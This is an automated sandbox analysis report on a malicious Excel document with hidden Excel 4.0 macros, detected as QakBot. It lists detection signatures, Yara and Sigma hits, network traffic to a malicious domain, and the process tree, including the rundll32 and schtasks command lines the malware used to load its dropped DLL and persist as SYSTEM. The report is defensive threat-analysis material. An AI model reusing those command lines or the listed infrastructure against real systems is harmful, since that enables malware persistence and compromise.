Play interactive tour

Edit tour

Analysis Report 9659e9a8_by_Libranalysis.xls

Overview

General Information

Sample Name:	9659e9a8_by_Libranalysis.xls
Analysis ID:	412182
MD5:	9659e9a80fba8f055fbe4e3757b0fd88
SHA1:	701af32440a369d3bf1533cf3d741904b614a470
SHA256:	252bda62a929c697a8b96035c1a52314d88067e745799cb66ac5d9dd593379b0
Tags:	SilentBuilder
Infos:
Most interesting Screenshot:

Detection

Hidden Macro 4.0

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Document exploit detected (drops PE files)

Malicious sample detected (through community Yara rule)

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Allocates memory in foreign processes

Document exploit detected (UrlDownloadToFile)

Document exploit detected (process start blacklist hit)

Drops PE files to the user root directory

Found Excel 4.0 Macro with suspicious formulas

Found abnormal large hidden Excel 4.0 Macro sheet

Injects code into the Windows Explorer (explorer.exe)

Machine Learning detection for dropped file

Maps a DLL or memory area into another process

Office process drops PE file

Overwrites code with unconditional jumps - possibly settings hooks in foreign process

Sigma detected: Microsoft Office Product Spawning Windows Shell

Uses schtasks.exe or at.exe to add and modify task schedules

Writes to foreign memory regions

Checks if the current process is being debugged

Contains functionality to dynamically determine API calls

Contains functionality to read the PEB

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected potential crypto function

Document contains embedded VBA macros

Drops PE files

Drops PE files to the user directory

Drops files with a non-matching file extension (content does not match file extension)

Found dropped PE file which has not been started or loaded

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

PE file contains sections with non-standard names

PE file does not import any functions

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Tries to load missing DLLs

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Startup

System is w10x64

EXCEL.EXE (PID: 6780 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)

rundll32.exe (PID: 7104 cmdline: rundll32 ..\ritofm.cvm,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

explorer.exe (PID: 6480 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)

schtasks.exe (PID: 6500 cmdline: 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn frjwqvc /tr 'regsvr32.exe -s \'C:\Users\user\ritofm.cvm\'' /SC ONCE /Z /ST 13:34 /ET 13:46 MD5: 15FF7D8324231381BAD48A052F85DF04)

conhost.exe (PID: 6512 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

rundll32.exe (PID: 5668 cmdline: rundll32 ..\ritofm.cvm1,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

regsvr32.exe (PID: 4816 cmdline: regsvr32.exe -s 'C:\Users\user\ritofm.cvm' MD5: D78B75FC68247E8A63ACBA846182740E)

regsvr32.exe (PID: 5132 cmdline: -s 'C:\Users\user\ritofm.cvm' MD5: 426E7499F6A7346F0410DEAD0805586B)

WerFault.exe (PID: 3912 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5132 -s 652 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

regsvr32.exe (PID: 984 cmdline: regsvr32.exe -s 'C:\Users\user\ritofm.cvm' MD5: D78B75FC68247E8A63ACBA846182740E)

regsvr32.exe (PID: 4780 cmdline: -s 'C:\Users\user\ritofm.cvm' MD5: 426E7499F6A7346F0410DEAD0805586B)

WerFault.exe (PID: 5828 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4780 -s 652 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000001.00000003.708454273.00000000049F0000.00000004.00000001.sdmp	QakBot	QakBot Payload	kevoreilly	0x12e27:$crypto: 8B 5D 08 0F B6 C2 8A 16 0F B6 1C 18 88 55 13 0F B6 D2 03 CB 03 CA 81 E1 FF 00 00 80 79 08 49 81 ...
00000005.00000002.984573064.0000000000EC0000.00000040.00000001.sdmp	QakBot	QakBot Payload	kevoreilly	0x13a27:$crypto: 8B 5D 08 0F B6 C2 8A 16 0F B6 1C 18 88 55 13 0F B6 D2 03 CB 03 CA 81 E1 FF 00 00 80 79 08 49 81 ...

Unpacked PEs

Source	Rule	Description	Author	Strings
5.2.explorer.exe.ec0000.0.raw.unpack	QakBot	QakBot Payload	kevoreilly	0x13a27:$crypto: 8B 5D 08 0F B6 C2 8A 16 0F B6 1C 18 88 55 13 0F B6 D2 03 CB 03 CA 81 E1 FF 00 00 80 79 08 49 81 ...
1.3.rundll32.exe.49f0000.0.raw.unpack	QakBot	QakBot Payload	kevoreilly	0x12e27:$crypto: 8B 5D 08 0F B6 C2 8A 16 0F B6 1C 18 88 55 13 0F B6 D2 03 CB 03 CA 81 E1 FF 00 00 80 79 08 49 81 ...
5.2.explorer.exe.ec0000.0.unpack	QakBot	QakBot Payload	kevoreilly	0x12e27:$crypto: 8B 5D 08 0F B6 C2 8A 16 0F B6 1C 18 88 55 13 0F B6 D2 03 CB 03 CA 81 E1 FF 00 00 80 79 08 49 81 ...
1.3.rundll32.exe.49f0000.0.unpack	QakBot	QakBot Payload	kevoreilly	0x12227:$crypto: 8B 5D 08 0F B6 C2 8A 16 0F B6 1C 18 88 55 13 0F B6 D2 03 CB 03 CA 81 E1 FF 00 00 80 79 08 49 81 ...

Sigma Overview

System Summary:

Sigma detected: Microsoft Office Product Spawning Windows Shell

Show sources

Source: Process started

Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: rundll32 ..\ritofm.cvm,DllRegisterServer, CommandLine: rundll32 ..\ritofm.cvm,DllRegisterServer, CommandLine|base64offset|contains: ], Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 6780, ProcessCommandLine: rundll32 ..\ritofm.cvm,DllRegisterServer, ProcessId: 7104

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Machine Learning detection for dropped file

Show sources

Source: C:\Users\user\ritofm.cvm	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\ue[1].htm	Joe Sandbox ML: detected

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File opened: C:\Windows\SysWOW64\MSVCR100.dll

Jump to behavior

Source: unknown	HTTPS traffic detected: 192.185.39.58:443 -> 192.168.2.4:49729 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 192.185.32.232:443 -> 192.168.2.4:49734 version: TLS 1.2

Source:	Binary string: ole32.pdb& source: WerFault.exe, 0000000F.00000003.738986461.0000000003F56000.00000004.00000040.sdmp
Source:	Binary string: wkernel32.pdb source: WerFault.exe, 0000000F.00000003.738934678.0000000003E31000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.886105989.00000000038C1000.00000004.00000001.sdmp
Source:	Binary string: sfc_os.pdb source: WerFault.exe, 0000000F.00000003.738986461.0000000003F56000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.886140821.0000000003896000.00000004.00000040.sdmp
Source:	Binary string: bcrypt.pdb source: WerFault.exe, 0000000F.00000003.738986461.0000000003F56000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.886140821.0000000003896000.00000004.00000040.sdmp
Source:	Binary string: ucrtbase.pdb source: WerFault.exe, 0000000F.00000003.738934678.0000000003E31000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.886105989.00000000038C1000.00000004.00000001.sdmp
Source:	Binary string: msvcrt.pdb source: WerFault.exe, 0000000F.00000003.738934678.0000000003E31000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.886105989.00000000038C1000.00000004.00000001.sdmp
Source:	Binary string: iphlpapi.pdbB source: WerFault.exe, 0000001B.00000003.886140821.0000000003896000.00000004.00000040.sdmp
Source:	Binary string: wrpcrt4.pdb source: WerFault.exe, 0000000F.00000003.738961075.0000000003F50000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.886126177.0000000003890000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdb source: WerFault.exe, 0000000F.00000003.738934678.0000000003E31000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.886105989.00000000038C1000.00000004.00000001.sdmp
Source:	Binary string: shcore.pdb source: WerFault.exe, 0000000F.00000003.738961075.0000000003F50000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.886126177.0000000003890000.00000004.00000040.sdmp
Source:	Binary string: bcrypt.pdb source: WerFault.exe, 0000000F.00000003.738986461.0000000003F56000.00000004.00000040.sdmp
Source:	Binary string: wgdi32.pdb source: WerFault.exe, 0000000F.00000003.738934678.0000000003E31000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.886105989.00000000038C1000.00000004.00000001.sdmp
Source:	Binary string: fltLib.pdb source: WerFault.exe, 0000000F.00000003.738986461.0000000003F56000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.886140821.0000000003896000.00000004.00000040.sdmp
Source:	Binary string: advapi32.pdb source: WerFault.exe, 0000000F.00000003.738986461.0000000003F56000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.886140821.0000000003896000.00000004.00000040.sdmp
Source:	Binary string: wsspicli.pdb source: WerFault.exe, 0000000F.00000003.738986461.0000000003F56000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.886140821.0000000003896000.00000004.00000040.sdmp
Source:	Binary string: regsvr32.pdbk source: WerFault.exe, 0000000F.00000003.738934678.0000000003E31000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.886105989.00000000038C1000.00000004.00000001.sdmp
Source:	Binary string: shell32.pdb source: WerFault.exe, 0000000F.00000003.738934678.0000000003E31000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.886126177.0000000003890000.00000004.00000040.sdmp
Source:	Binary string: sechost.pdb4 source: WerFault.exe, 0000000F.00000003.738986461.0000000003F56000.00000004.00000040.sdmp
Source:	Binary string: msvcp_win.pdb source: WerFault.exe, 0000000F.00000003.738934678.0000000003E31000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.886105989.00000000038C1000.00000004.00000001.sdmp
Source:	Binary string: propsys.pdb8 source: WerFault.exe, 0000000F.00000003.738986461.0000000003F56000.00000004.00000040.sdmp
Source:	Binary string: wkernelbase.pdb source: WerFault.exe, 0000000F.00000003.738934678.0000000003E31000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.886105989.00000000038C1000.00000004.00000001.sdmp
Source:	Binary string: shlwapi.pdb source: WerFault.exe, 0000000F.00000003.738986461.0000000003F56000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.886140821.0000000003896000.00000004.00000040.sdmp
Source:	Binary string: mpr.pdb source: WerFault.exe, 0000000F.00000003.738961075.0000000003F50000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.886126177.0000000003890000.00000004.00000040.sdmp
Source:	Binary string: wsspicli.pdb> source: WerFault.exe, 0000000F.00000003.738986461.0000000003F56000.00000004.00000040.sdmp
Source:	Binary string: wwin32u.pdb source: WerFault.exe, 0000000F.00000003.738934678.0000000003E31000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.886105989.00000000038C1000.00000004.00000001.sdmp
Source:	Binary string: mpr.pdbrn source: WerFault.exe, 0000001B.00000003.886126177.0000000003890000.00000004.00000040.sdmp
Source:	Binary string: setupapi.pdb source: WerFault.exe, 0000000F.00000003.738986461.0000000003F56000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.886140821.0000000003896000.00000004.00000040.sdmp
Source:	Binary string: fCReportStore::Prune: MaxReportCount=%d MaxSizeInMb=%dRSDSwkernel32.pdb source: WerFault.exe, 0000000F.00000002.745476578.0000000000B22000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000002.892965832.00000000003A2000.00000004.00000001.sdmp
Source:	Binary string: regsvr32.pdb source: WerFault.exe, 0000000F.00000003.738934678.0000000003E31000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.886105989.00000000038C1000.00000004.00000001.sdmp
Source:	Binary string: propsys.pdbH source: WerFault.exe, 0000001B.00000003.886140821.0000000003896000.00000004.00000040.sdmp
Source:	Binary string: shlwapi.pdbz source: WerFault.exe, 0000000F.00000003.738986461.0000000003F56000.00000004.00000040.sdmp
Source:	Binary string: mpr.pdb3 source: WerFault.exe, 0000000F.00000003.738961075.0000000003F50000.00000004.00000040.sdmp
Source:	Binary string: shcore.pdbk source: WerFault.exe, 0000000F.00000003.738961075.0000000003F50000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.886126177.0000000003890000.00000004.00000040.sdmp
Source:	Binary string: profapi.pdb source: WerFault.exe, 0000000F.00000003.738986461.0000000003F56000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.886140821.0000000003896000.00000004.00000040.sdmp
Source:	Binary string: winspool.pdb source: WerFault.exe, 0000000F.00000003.738986461.0000000003F56000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.886140821.0000000003896000.00000004.00000040.sdmp
Source:	Binary string: wgdi32full.pdb source: WerFault.exe, 0000000F.00000003.738934678.0000000003E31000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.886105989.00000000038C1000.00000004.00000001.sdmp
Source:	Binary string: shell32.pdbk source: WerFault.exe, 0000001B.00000003.886126177.0000000003890000.00000004.00000040.sdmp
Source:	Binary string: shlwapi.pdbj source: WerFault.exe, 0000001B.00000003.886140821.0000000003896000.00000004.00000040.sdmp
Source:	Binary string: sechost.pdb source: WerFault.exe, 0000000F.00000003.738986461.0000000003F56000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.886140821.0000000003896000.00000004.00000040.sdmp
Source:	Binary string: combase.pdbr source: WerFault.exe, 0000001B.00000003.886140821.0000000003896000.00000004.00000040.sdmp
Source:	Binary string: iphlpapi.pdb source: WerFault.exe, 0000000F.00000003.738986461.0000000003F56000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.886140821.0000000003896000.00000004.00000040.sdmp
Source:	Binary string: propsys.pdb source: WerFault.exe, 0000000F.00000003.738986461.0000000003F56000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.886140821.0000000003896000.00000004.00000040.sdmp
Source:	Binary string: cfgmgr32.pdbk source: WerFault.exe, 0000000F.00000003.738961075.0000000003F50000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.886126177.0000000003890000.00000004.00000040.sdmp
Source:	Binary string: fltLib.pdbd source: WerFault.exe, 0000001B.00000003.886140821.0000000003896000.00000004.00000040.sdmp
Source:	Binary string: ole32.pdbP source: WerFault.exe, 0000001B.00000003.886140821.0000000003896000.00000004.00000040.sdmp
Source:	Binary string: sfc.pdbK source: WerFault.exe, 0000000F.00000003.738986461.0000000003F56000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.886140821.0000000003896000.00000004.00000040.sdmp
Source:	Binary string: powrprof.pdb source: WerFault.exe, 0000000F.00000003.738986461.0000000003F56000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.886140821.0000000003896000.00000004.00000040.sdmp
Source:	Binary string: ole32.pdb source: WerFault.exe, 0000000F.00000003.738986461.0000000003F56000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.886140821.0000000003896000.00000004.00000040.sdmp
Source:	Binary string: AcLayers.pdb source: WerFault.exe, 0000000F.00000003.738934678.0000000003E31000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.886105989.00000000038C1000.00000004.00000001.sdmp
Source:	Binary string: Kernel.Appcore.pdb source: WerFault.exe, 0000000F.00000003.738961075.0000000003F50000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.886126177.0000000003890000.00000004.00000040.sdmp
Source:	Binary string: cryptbase.pdb source: WerFault.exe, 0000000F.00000003.738986461.0000000003F56000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.886140821.0000000003896000.00000004.00000040.sdmp
Source:	Binary string: bcryptprimitives.pdb source: WerFault.exe, 0000000F.00000003.738961075.0000000003F50000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.886126177.0000000003890000.00000004.00000040.sdmp
Source:	Binary string: cfgmgr32.pdb source: WerFault.exe, 0000000F.00000003.738961075.0000000003F50000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.886126177.0000000003890000.00000004.00000040.sdmp
Source:	Binary string: combase.pdb source: WerFault.exe, 0000000F.00000003.738986461.0000000003F56000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.886140821.0000000003896000.00000004.00000040.sdmp
Source:	Binary string: Windows.Storage.pdb source: WerFault.exe, 0000000F.00000003.738961075.0000000003F50000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.886126177.0000000003890000.00000004.00000040.sdmp
Source:	Binary string: sfc_os.pdbV source: WerFault.exe, 0000001B.00000003.886140821.0000000003896000.00000004.00000040.sdmp
Source:	Binary string: bcrypt.pdb~ source: WerFault.exe, 0000001B.00000003.886140821.0000000003896000.00000004.00000040.sdmp
Source:	Binary string: oleaut32.pdb source: WerFault.exe, 0000000F.00000003.738986461.0000000003F56000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.886140821.0000000003896000.00000004.00000040.sdmp
Source:	Binary string: sfc.pdb source: WerFault.exe, 0000000F.00000003.738986461.0000000003F56000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.886140821.0000000003896000.00000004.00000040.sdmp
Source:	Binary string: iphlpapi.pdb* source: WerFault.exe, 0000000F.00000003.738986461.0000000003F56000.00000004.00000040.sdmp
Source:	Binary string: apphelp.pdb source: WerFault.exe, 0000000F.00000003.738934678.0000000003E31000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.886105989.00000000038C1000.00000004.00000001.sdmp
Source:	Binary string: advapi32.pdb\ source: WerFault.exe, 0000001B.00000003.886140821.0000000003896000.00000004.00000040.sdmp
Source:	Binary string: wuser32.pdb source: WerFault.exe, 0000000F.00000003.738934678.0000000003E31000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.886105989.00000000038C1000.00000004.00000001.sdmp
Source:	Binary string: wntdll.pdbk source: WerFault.exe, 0000000F.00000003.738934678.0000000003E31000.00000004.00000001.sdmp

Source: C:\Windows\SysWOW64\explorer.exe

Code function: 5_2_00ED0C51 FindFirstFileW,FindNextFileW,

5_2_00ED0C51

Software Vulnerabilities:

Document exploit detected (drops PE files)

Show sources

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File created: ue[1].htm.0.dr

Jump to dropped file

Document exploit detected (UrlDownloadToFile)

Show sources

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

Section loaded: unknown origin: URLDownloadToFileA

Jump to behavior

Document exploit detected (process start blacklist hit)

Show sources

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

Process created: C:\Windows\SysWOW64\rundll32.exe

Source: global traffic

DNS query: name: signifysystem.com

Source: global traffic

TCP traffic: 192.168.2.4:49729 -> 192.185.39.58:443

Source: global traffic

TCP traffic: 192.168.2.4:49729 -> 192.185.39.58:443

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown

DNS traffic detected: queries for: signifysystem.com

Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	String found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	String found in binary or memory: http://weather.service.msn.com/data.aspx
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	String found in binary or memory: https://addinsinstallation.store.office.com/app/download
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	String found in binary or memory: https://addinslicensing.store.office.com/commerce/query
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	String found in binary or memory: https://analysis.windows.net/powerbi/api
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	String found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	String found in binary or memory: https://api.aadrm.com/
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	String found in binary or memory: https://api.addins.omex.office.net/appinfo/query
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	String found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	String found in binary or memory: https://api.addins.store.office.com/app/query
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	String found in binary or memory: https://api.cortana.ai
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	String found in binary or memory: https://api.diagnostics.office.com
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	String found in binary or memory: https://api.diagnosticssdf.office.com
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	String found in binary or memory: https://api.microsoftstream.com/api/
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	String found in binary or memory: https://api.office.net
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	String found in binary or memory: https://api.onedrive.com
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	String found in binary or memory: https://api.powerbi.com/beta/myorg/imports
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	String found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	String found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	String found in binary or memory: https://apis.live.net/v5.0/
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	String found in binary or memory: https://arc.msn.com/v4/api/selection
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	String found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	String found in binary or memory: https://augloop.office.com
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	String found in binary or memory: https://augloop.office.com/v2
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	String found in binary or memory: https://autodiscover-s.outlook.com/
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	String found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	String found in binary or memory: https://cdn.entity.
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	String found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	String found in binary or memory: https://clients.config.office.net/
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	String found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	String found in binary or memory: https://config.edge.skype.com
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	String found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	String found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	String found in binary or memory: https://cortana.ai
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	String found in binary or memory: https://cortana.ai/api
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	String found in binary or memory: https://cr.office.com
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	String found in binary or memory: https://dataservice.o365filtering.com
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	String found in binary or memory: https://dataservice.o365filtering.com/
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	String found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	String found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	String found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	String found in binary or memory: https://dev.cortana.ai
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	String found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	String found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	String found in binary or memory: https://devnull.onenote.com
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	String found in binary or memory: https://directory.services.
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	String found in binary or memory: https://ecs.office.com/config/v2/Office
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	String found in binary or memory: https://entitlement.diagnostics.office.com
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	String found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	String found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	String found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	String found in binary or memory: https://globaldisco.crm.dynamics.com
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	String found in binary or memory: https://graph.ppe.windows.net
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	String found in binary or memory: https://graph.ppe.windows.net/
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	String found in binary or memory: https://graph.windows.net
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	String found in binary or memory: https://graph.windows.net/
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
